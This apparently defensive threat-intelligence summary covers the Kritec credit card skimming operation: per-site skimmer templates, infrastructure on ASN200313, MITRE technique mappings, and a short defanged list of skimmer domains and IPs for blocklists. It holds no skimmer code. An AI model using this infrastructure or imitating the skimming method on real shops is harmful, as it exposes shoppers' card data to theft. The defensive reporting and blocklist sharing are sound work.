Credit card skimming campaigns are rising during the holiday shopping season, with the Kritec operation tailoring its skimmers for each victim site and expanding its infrastructure. The article also offers safety guidance for online shoppers and publishes a list of related infrastructure IOCs.
#Kritec #CreditCardSkimming
#Kritec #CreditCardSkimming
Keypoints
- The Kritec credit card skimming operation first appeared in March 2023 and stands out for its large volume and site-specific skimmer templates.
- Attackers customize the skimmer for each victim site, using convincing templates and localization in multiple languages, making detection harder for shoppers.
- Activity spiked in October, with measurements based on the number of newly registered domain names attributed to the threat actor.
- The skimming infrastructure is hosted on the IT WEB LTD network (ASN200313) registered in the British Virgin Islands.
- Practical guidance includes checking CMS/plugins for outdated software, using web protection tools, and enabling heuristic detection for malicious JavaScript snippets.
- Malwarebytes highlights a published list of Kritec infrastructure domains and IPs to help community blocklists and defensive products.
MITRE Techniques
- [T1189] Drive-by Compromise β Attacker compromises merchant websites to insert skimmer code that intercepts purchases; βWhen a merchant website is hacked, any purchase made has the potential of being intercepted by bad actors. Often, the malicious code is right underneath the surface and yet completely invisible to shoppers.β
- [T1583.003] Acquire Infrastructure: Domains β The campaign uses newly registered domains to support its operation; βWe measured this activity based on the number of newly registered domain names attributed to this threat actor.β
Indicators of Compromise
- [Domain] Kritec domains β oumymob[.]shop, nujtec[.]shop, and other domains
- [IP] Kritec IPs β 195[.]242[.]110[.]102, 195[.]242[.]110[.]103, and other IPs